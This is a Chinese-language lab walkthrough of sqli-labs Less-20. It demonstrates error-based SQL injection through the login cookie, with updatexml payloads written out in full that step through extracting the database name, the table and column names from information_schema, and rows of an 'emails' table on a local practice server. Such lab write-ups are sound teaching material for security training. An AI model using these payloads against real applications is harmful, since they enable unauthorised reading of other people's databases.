前言 {#前言}

第20题我们输入正确的用户名密码点击登录之后会发现他记录了我们许多的信息，当然最重要的一点就是下面记录了我们的cookie，那我们可以从cookie下手尝试注入

前期准备 {#前期准备}

开启phpstudy，开启apache服务以及mysql服务

实验环节 {#实验环节}

浏览器访问Less-20 {#浏览器访问Less-20}

http://192.168.199.135/sqli-labs-master/Less-20/

判断库名 {#判断库名}

'and updatexml(1,concat(0x7e,(SELECT database()),0x7e),1)-- xz

判断表名 {#判断表名}

判断其他表名列名使用limit 0,1 1,1 2,1 3,1等等

'and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security'limit 0,1),0x7e),1)-- xz

判断列名 {#判断列名}

 'and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),0x7e),1)-- xz

判断数据 {#判断数据}

'and updatexml(1,concat(0x7e,(select id from emails limit 0,1),0x7e),1)-- xz